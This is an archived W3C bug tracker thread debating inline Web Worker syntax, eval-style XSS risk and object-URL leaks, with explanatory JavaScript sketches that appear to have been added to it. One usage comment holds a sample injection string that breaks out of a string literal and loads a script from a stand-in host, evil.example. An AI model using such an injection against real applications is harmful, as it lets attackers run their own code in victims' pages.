This is an archived snapshot of W3C's public bugzilla bug tracker, decommissioned in April 2019. Please see the home page for more details.

Bug 22700 - Inline Web worker scripts
Summary: Inline Web worker scripts
Status: RESOLVED WONTFIX
Alias: None
Product: WHATWG
Classification: Unclassified
Component: HTML
Version: unspecified
Hardware: Other other
Importance: P3 enhancement
Target Milestone: Unsorted
Assignee: Domenic Denicola
QA Contact: contributor
URL:
Whiteboard: blocked on dependencies
Keywords:
Depends on: 25868
Blocks:
Reported: 2013-07-16 18:10 UTC by Ian 'Hixie' Hickson
Modified: 2016-03-16 14:09 UTC
CC List: 12 users

See Also:


Attachments

Description Ian 'Hixie' Hickson 2013-07-16 18:10:19 UTC
On Tue, 20 Nov 2012, Elliott Sprehn wrote:
>
> This has come up a couple times with developers and I think being able
> to do:
>
> <script type="worker" id="taskQueue">
>   ...
> </script>
>
> and then being able to access the worker to post message it by id would
> be extremely useful.
>
> document.getElementById('taskQueue').worker.postMessage(...);
>
> Forcing the code into a separate file or requiring a data URL is
> annoying.
Comment 1 Ian 'Hixie' Hickson 2014-05-16 21:48:42 UTC
Is this something anyone else would be interested in implementing?
Comment 2 Jonas Sicking (Not reading bugmail) 2014-05-16 23:06:42 UTC
This is definitely something we're interested in. Though it's very unclear to me what the syntax should be.

A lower-level solution than the one in comment 0 would be something like:

new InlineWorker("script here");

This would also allow solving use cases like dynamically generated code.

Note though that both this and the solution in comment 0 are basically syntax sugar for:

new Worker(URL.createObjectURL(new Blob(["code here"])));
or
new Worker(URL.createObjectURL(
  new Blob([document.getElementById('taskQueue').textContent])));

(in fact, the syntax in comment 0 could probably be implemented using custom elements).



However something like

function doSomeWork(...) {
  var a, b, c = x();

  function doAsyncWork(...) {
    ...
  }

  return new Promise((resolve, reject) => {
    var w = new InlineWorker(doAsyncWork);
    w.postMessage(a);
    w.onmessage = (e) => resolve(e.data);
  });
}

would be even more awesome, especially if it would allow dependent scope of doAsyncWork to be cloned into the worker. But this requires new ES primitives.
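
Short of new ES primitives, a self-contained function can be shipped to a worker by serializing it with Function.prototype.toString(). The following is a minimal sketch and not the InlineWorker proposed in comment 2: workerSourceFromFunction is a hypothetical helper name, and it only works for function expressions, declarations, or arrow functions that reference nothing from their enclosing scope, which is exactly the limitation comment 2 points out.

```javascript
// Hypothetical helper: wraps a closure-free function in worker boilerplate.
// Only the function's text is copied, not its scope, so free variables such
// as `a`, `b`, or `c` in the example above would be undefined in the worker.
function workerSourceFromFunction(fn) {
  if (typeof fn !== "function") {
    throw new TypeError("expected a function");
  }
  return (
    "self.onmessage = async function (event) {\n" +
    "  var result = await (" + fn.toString() + ")(event.data);\n" +
    "  self.postMessage(result);\n" +
    "};\n"
  );
}

// Browser usage (assumes Worker, Blob and URL.createObjectURL exist):
//   var source = workerSourceFromFunction(function (n) { return n * 2; });
//   var worker = new Worker(URL.createObjectURL(new Blob([source])));
//   worker.onmessage = function (e) { console.log(e.data); };
//   worker.postMessage(21);
```

The generated source awaits the function's result, so the function may return either a plain value or a promise.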
Comment 3 Anne 2014-05-18 12:36:59 UTC
I've been thinking about having something like

  <script type=worker>
    ...
  </script>

  <script>
    document.querySelector("script").port.postMessage("hey worker")
  </script>

or maybe even

  <worker>

  </worker>

if the whole <module> thing goes ahead.
Comment 4 Domenic Denicola 2014-05-18 16:42:27 UTC
Relatedly, we still need a story for loading modules as workers:

https://github.com/dherman/web-modules/issues/3

I think the same considerations would apply though. Although perhaps it would change Anne's proposal to be `<script type="worker">` + `<module type="worker">`.

Also anything that works for inline `<script>`/`<module>` should work for ones with `src`. So e.g.

<script type="worker" src="/path/to/worker.js"></script>
<script>
  document.querySelector("script[type='worker']").port.postMessage("hey worker");
</script>

(and the above should be the same with s/script/module/g.)
Comment 5 Ian 'Hixie' Hickson 2014-05-19 20:00:04 UTC
Please file a new bug for the module integration. Thanks!
Comment 6 Dave Herman 2014-05-27 22:00:38 UTC
I worked through some of the design space today. There are a number of variables here and they have to be useful in combination with each other, which leads to a fairly large combinatorial space. Write-up here:

https://gist.github.com/dherman/8b138ebf3eb0f322644b

Here's my overall take on this:

* It should be `<script module>` not `<script type="module">`. (I'll say more about that in Bug 25868.)

* If we have HTML syntax for `worker`, it should be an attribute rather than a type. This way it can be used in combination with other attributes like `module`.

* However, I'm unconvinced it's worth having HTML syntax for the case of workers. I think it adds confusion (`<script worker module>` is pretty o.O) without enough value, and we should just focus on improving the JS API ergonomics.

* I don't think subclassing `Worker` is going to work well here because we have a proliferation of kinds of workers already -- `Worker`, `SharedWorker`, service worker, perhaps more coming? -- and they all need to be able to use these degrees of variability. A reasonable step forward would be to have a new `Work` type that we can backwards-compatibly overload all of those constructors to accept instead of DOMString. That way you could do e.g.:

var worker = new SharedWorker(new Work({
  source: "console.log('hello from a worker')",
  script: true
}));

This way we don't have to create a combinatorial explosion of subclasses of `Worker`. This still isn't ideal from an ergonomics standpoint, but it's an improvement over creating object URLs. We could later create one or two convenience functions for the most common combinations.

Dave
Comment 7 Boris Zbarsky 2014-05-28 01:11:59 UTC
You don't even need the "new Work" bit if you just use a dictionary.  So:

  var worker = new SharedWorker({
    source: "console.log('hello from a worker')",
    script: true
  });
Comment 8 Dave Herman 2014-05-28 03:09:17 UTC
I believe that breaks compat, since the current behavior coerces objects to strings, no?

Dave
Comment 9 Boris Zbarsky 2014-05-28 03:55:10 UTC
That's true, but does anyone depend on the current behavior in practice?  I suspect the answer is "no".
Comment 10 Dave Herman 2014-05-28 04:11:12 UTC
If we can get away with it the ergonomics are far better. Ideally we could eliminate the coercion entirely and test for typeof 'string'; doing a test for "is it a 'plain object'" is bad practice.

Dave
Comment 11 Boris Zbarsky 2014-05-28 04:15:19 UTC
If we basically overload a DOMString and a dictionary, then the WebIDL overload resolution will effectively check for "typeof == object or typeof == undefined" and take the dictionary path if so, else coerce to string.  Well, except for RegExp and Date objects, for reasons that don't make too much sense to me; those will get coerced to string.  If someone does |new Worker(new Date())| I claim any behavior is governed by GIGO.
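
The dispatch described in comment 11 can be approximated in plain JavaScript. This is only a sketch of the rule as stated in that comment, not the WebIDL overload resolution algorithm itself, which has more cases; classifyWorkerArgument is a hypothetical name.

```javascript
// Hypothetical illustration of the rule described in comment 11: objects and
// undefined take the dictionary path, except Date and RegExp objects, which
// fall through to string coercion like every other value.
function classifyWorkerArgument(value) {
  var isDateOrRegExp = value instanceof Date || value instanceof RegExp;
  var looksLikeDictionary =
    typeof value === "undefined" ||
    (typeof value === "object" && !isDateOrRegExp);
  if (looksLikeDictionary) {
    return { kind: "dictionary", value: value };
  }
  return { kind: "string", value: String(value) };
}
```

Under this rule, classifyWorkerArgument("worker.js") takes the string path, classifyWorkerArgument({ source: "..." }) takes the dictionary path, and classifyWorkerArgument(new Date()) is coerced to a string.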
Comment 12 Ian 'Hixie' Hickson 2014-05-28 05:32:03 UTC
I would be very skeptical of any API that takes a string and evaluates it. The authoring ergonomics of this encourage very bad practices like:

   var worker = new Worker({
     source: "console.log('hello " + name + "')"
   });

Having APIs with affordances like this has been one of the Web's weaknesses.

That's why I like the idea of an inline <script type=worker>-style solution, as opposed to an API that takes a string.

Can you elaborate on why you didn't like that approach?
Comment 13 Anne 2014-05-28 09:59:46 UTC
(In reply to Ian 'Hixie' Hickson from comment #12)
> Can you elaborate on why you didn't like that approach?

The reason seems to be that we have many different types of workers. However, shared workers and service workers cannot be bootstrapped via a string; they need to be a network resource, so the problem with combinatorial explosion might be less bad than Dave thinks.
Comment 14 Anne 2014-05-28 10:58:22 UTC
Dave, I have a hard time seeing how <script module> is an improvement over <script type=module> if the *long term* idea is still <module>. Short term the type attribute would be required.

Also, what is a "worker module"? A concurrent module? Presumably we want something better for something like that than the postMessage() API. E.g. the ability to import/export things that return promises. Or not?
Comment 15 Dave Herman 2014-05-28 13:12:18 UTC
Ian: what's wrong with creating a worker from a source string? I don't understand why you call that a bad practice.

Re: doing it in HTML, it's not that I'm opposed to it in principle, but we don't need all the dials and knobs in HTML; it should have high level forms for the most common cases. But the programmatic layer should support the full generality of all possibilities.

Anne: a worker that executes a Module instead of a Script is exactly what the <module> tag is. It's top level code that can use the import syntax. We need to be heading for a world where no one has to use the Script non-terminal anymore, nor importScripts.

Dave
Comment 16 Dave Herman 2014-05-28 13:15:24 UTC
Anne: forgot to say, I'm not objecting to script type=module on ergonomic grounds; as you say the end game is that <module> is the new <script>. It simply fails to allow combining multiple attributes unless we allow e.g. script type="module worker".

Dave
Comment 17 Anne 2014-05-28 13:25:51 UTC
Dave, I'm still confused. Using your proposed syntax and ignoring the type attribute problem: <script module> == <module>, <script worker> == new Worker(new Work(...)) (as explained, shared workers and service workers cannot use this; they require the URL), <script module worker> == ? It's the last one that's confusing to me.

And Ian is objecting to eval()-style generation of scripts being highly prone to XSS attacks.
Comment 18 Jonas Sicking (Not reading bugmail) 2014-05-28 17:55:48 UTC
> I would be very skeptical of any API that takes a string and evaluates it.
> The authoring ergonomics of this encourage very bad practices like:
> 
>    var worker = new Worker({
>      source: "console.log('hello " + name + "')"
>    });
> 
> Having APIs with affordances like this has been one of the Web's weaknesses.

I don't see any difference between that and <script type=worker>. <script type=worker> will simply lead to

var s = document.createElement("script");
s.textContent = "console.log('hello " + name + "')";
document.head.appendChild(s);

Or using document.write() to similarly create the <script> markup.

Or doing the same thing serverside.

I agree that we have a problem that we don't have a way to create an execution environment that contains a mixture of trusted script and untrusted values. But I don't think inline <script>s address that any better than taking a string and evaluating it.

One thing we could do is something like:

  var worker = new SharedWorker({
    source: "console.log('hello ' + self.arguments.name)",
    arguments: {
      name: name
    },
    argumentTransfer: [],
  });
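
The `arguments` and `argumentTransfer` members in comment 18 are a proposal, not an existing API. The same separation of trusted code and untrusted values can be had today by keeping the worker source constant and sending the values with postMessage(). A minimal sketch under that assumption; GREETER_SOURCE and greet are hypothetical names.

```javascript
// Constant worker source: no untrusted value is ever spliced into it.
var GREETER_SOURCE =
  "self.onmessage = function (event) {\n" +
  "  self.postMessage('hello ' + event.data.name);\n" +
  "};\n";

// Untrusted values travel as message data, never as code.
function greet(worker, name) {
  worker.postMessage({ name: String(name) });
}

// Browser usage (assumes Worker, Blob and URL.createObjectURL exist):
//   var worker = new Worker(URL.createObjectURL(new Blob([GREETER_SOURCE])));
//   worker.onmessage = function (e) { console.log(e.data); };
//   greet(worker, "'); importScripts('https://evil.example/x.js'); ('");
```

With the concatenated form, a name like the one in the usage comment would close the string literal and run as code; here it is only ever treated as text.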
Comment 19 Ian 'Hixie' Hickson 2014-05-28 18:14:45 UTC
Please move the module syntax discussion to bug 25868. Thanks.

(In reply to Dave Herman from comment #15)
> Ian: what's wrong with creating a worker from a source string? I don't
> understand why you call that a bad practice.

It's essentially the same as eval, and has all the same problems, as far as I can tell. The main problem, as I described above, is that it encourages string-based code manipulation.


> Re: doing it in HTML, it's not that I'm opposed to it in principle, but we
> don't need all the dials and knobs in HTML; it should have high level forms
> for the most common cases. But the programmatic layer should support the
> full generality of all possibilities.

I don't think I agree with this as a general principle. Some things belong at the markup level, some things belong in scripted APIs, some things belong in CSS, some things belong in HTTP, etc.

But in any case, we already have a way to do this from JS. You "just" construct a data: URL for the script and execute that. This bug is just about adding a more convenient way of doing that.
Comment 20 Ian 'Hixie' Hickson 2014-05-28 18:16:46 UTC
(It's true that people do the same with HTML. But I think the additional friction is still helpful, for the same reason that eval is worse for this than <script>.)
Comment 21 Jonas Sicking (Not reading bugmail) 2014-05-28 18:27:21 UTC
Do we have any data indicating that eval() is causing more problems than <script> is? My very non-scientific experience is the opposite. I.e. I hear about more XSS attacks having happened due to <script>, than due to eval().
Comment 22 Dave Herman 2014-05-28 19:06:53 UTC
OK sorry, let me try to explain better. The Script non-terminal in ES6 does not allow declarative `import` syntax (e.g., `import foo from "foo";`), but the Module non-terminal does. So if you have a top-level Script that wants to load libraries, it has to use the callbacky reflective API (`System.import("foo").then(function(foo) { ... })`) instead of the normal declarative syntax.

Generally, we need to get to a place where any part of the platform that executes scripts can also execute the Module non-terminal, so that you can write your top-level code to declaratively import their dependencies. The <module> tag is one such case: it accepts the Module non-terminal, and is forcibly async so that importing doesn't block the main thread.

Workers are another such case: it should be possible to load a Worker that uses a bunch of modules and declaratively imports them from its top level code:

  import dict from "dict";
  import _ from "underscore";
  ...

This is a worker whose top level is a Module rather than a Script.

As for the XSS concern: the current design doesn't serve as a real deterrent for XSS or force people to think carefully about how they dynamically create a worker from source. All it does is force them to Google for a userland workaround or download a library that does the workaround for them, which jumps through the createObjectURL hoops. And then they tend to forget to revoke the URL afterwards, leaking memory. Here are some real-world examples of people doing the createObjectURL workaround:

* https://developer.mozilla.org/en/docs/Web/Guide/Performance/Using_web_workers#Embedded_workers
* https://coderwall.com/p/5te2lg
* https://market.sencha.com/extensions/ext-ux-webworker
* https://gist.github.com/tiffon/4368560
* http://blog.namangoel.com/replacing-eval-with-a-web-worker

Every single one of those links provides an implementation that fails to revoke the object URL. This isn't protecting anyone, and instead it's causing problems of its own.

Dave
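
For reference, a version of the createObjectURL workaround from comment 22 that does revoke the URL might look like the sketch below. createInlineWorker is a hypothetical helper name, and the `env` parameter is an assumption added so the sketch can be exercised with stand-ins outside a browser. It also assumes the object URL is resolved while the Worker constructor runs, so that revoking immediately afterwards is safe.

```javascript
// Hypothetical helper: creates a worker from source text and revokes the
// temporary object URL so it does not leak.
// `env` defaults to the global object and must provide Blob, URL and Worker.
function createInlineWorker(source, env) {
  env = env || globalThis;
  var blob = new env.Blob([source], { type: "text/javascript" });
  var url = env.URL.createObjectURL(blob);
  try {
    return new env.Worker(url);
  } finally {
    // Assumption: the URL is resolved during construction, so it can be
    // released right away. If a target browser disagrees, defer this call
    // until the worker has posted its first message.
    env.URL.revokeObjectURL(url);
  }
}

// Browser usage:
//   var worker = createInlineWorker("self.postMessage('ready');");
//   worker.onmessage = function (e) { console.log(e.data); };
```

The try/finally ensures the URL is revoked even when the Worker constructor throws.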
Comment 23 Dave Herman 2014-05-28 19:11:11 UTC
(Re: moving the modules conversation, I'm only talking about modules here insofar as it affects the design of inline workers, which is what this bug is about.)
Comment 24 Dave Herman 2014-05-28 19:28:38 UTC
> > Re: doing it in HTML, it's not that I'm opposed to it in principle, but we
> > don't need all the dials and knobs in HTML; it should have high level forms
> > for the most common cases. But the programmatic layer should support the
> > full generality of all possibilities.
> 
> I don't think I agree with this as a general principle. Some things belong
> at the markup level, some things belong in scripted APIs, some things belong
> in CSS, some things belong in HTTP, etc.

Having things that HTML can do but that aren't given convenient JS entry points is a real problem in the web platform. It means that to resolve a relative URL you programmatically create an `a` tag. It means that to parse RGB you programmatically create an element, style it, and call getComputedStyle(). These kinds of nuisances are the status quo in web development.

> But in any case, we already have a way to do this from JS. You "just"
> construct a data: URL for the script and execute that. This bug is just
> about adding a more convenient way of doing that.

Creating artificial minor inconveniences doesn't provide extra security. It just causes people to route around the problem, whether via copy-pasting from Stack Overflow or using a library.

Dave
Comment 25 Dave Herman 2014-05-28 19:47:31 UTC
Just chatted with Anne on IRC and he helped me realize that

<script type="module">
<script type="worker">

are fine as long as the latter automatically uses the Module non-terminal. More generally, going forward, any new script context we add should use the Module non-terminal.

This avoids proliferation of mode switches; <script type="worker"> is much nicer than <script worker module>.

Down the road we could also have

<module type="worker">

which would be identical to

<script type="worker">

Dave
Comment 26 Domenic Denicola 2014-05-28 20:15:51 UTC
If we're adding new tags anyway, let's go for broke, and add `<worker>` alongside `<module>`.

Dave, I wonder if the imperative API for worker-module creation should mirror, or otherwise be related to, the imperative API for module creation? Which IIRC is:

System.define("module name", `// lots of
// js source
// goes here`);
Comment 27 Ian 'Hixie' Hickson 2014-05-28 21:45:41 UTC
Let's first figure out the worker syntax (that's bug 25868) before we try to work out how inline workers might work. It's not even clear that anyone wants to implement inline workers in the first place.
Comment 28 Anne 2014-05-29 09:12:59 UTC
Assuming you meant first figure out the *module* syntax, sounds fine to me.
Comment 29 Ian 'Hixie' Hickson 2014-05-29 18:27:49 UTC
Er, right, my bad.
Comment 30 Domenic Denicola 2016-01-22 06:57:09 UTC
Moved discussion of worker modules to https://github.com/whatwg/html/issues/550. Leaving this bug open in case we ever want to come back to the idea of inline workers.
Comment 31 Anne 2016-03-16 14:09:48 UTC
Let's close this. If it comes up again there's likely a concrete proposal involved. This thread has a lot of <script type=module> confusion.